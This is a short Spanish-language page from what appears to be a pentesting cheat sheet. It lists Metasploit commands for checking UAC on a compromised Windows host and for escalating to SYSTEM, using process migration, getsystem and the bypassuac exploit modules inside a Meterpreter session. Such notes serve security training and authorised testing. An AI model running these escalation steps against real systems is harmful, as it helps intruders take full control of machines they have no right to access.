Metasploit

Verificación de UAC (User Account Control) habilitada.

use post/windows/gather/win_privs
set SESSION <id-session>
run

Escalamiento de privilegios sin UAC (User Account Control) habilitada.

# Meterpreter
ps
run post/windows/manage/migrate
ps
getsystem
getuid

Escalamiento de privilegios con UAC (User Account Control) habilitada.

search bypassuac
# Seleccionar exploit adecuado de bypass UAC
use exploit/windows/local/bypassuac*
set SESSION <id-session>
exploit
# Desde sesión de meterpreter
run post/windows/manage/migrate
getsystem
getuid

AnteriorHerramientas automatizadas SiguienteAlways install elevated

Última actualización hace 2 años